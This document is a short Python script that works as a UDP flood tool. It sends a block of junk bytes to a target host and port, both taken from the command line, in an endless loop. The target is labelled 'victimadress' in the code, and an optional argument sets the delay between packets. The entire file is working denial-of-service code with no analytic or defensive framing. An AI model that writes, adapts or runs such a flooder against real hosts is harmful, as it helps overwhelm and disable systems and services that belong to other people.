#!/usr/bin/python3

import socket
import sys
import time
import os

timewait = 0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001

if sys.argv[3] == "timeset":

    timewait = int(sys.argv[4])

else:
    pass


s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

victimadress = (str(sys.argv[1]), int(sys.argv[2]))

#i = 0


while True:
    time.sleep(timewait)
    s.sendto(b"""
    wdwdweawofnwlke
    mefnalkwenfwlkan
    nflkanfleknf
    nfalwfmaeojf
    fnelwmjfepifjpjAef
    fnlofaejrjdflEMjf
    fjewlsmjfwslkf
    fwmjopesmlrfpjk
    """, victimadress)

    #i += 1

    #print("Send!", i)
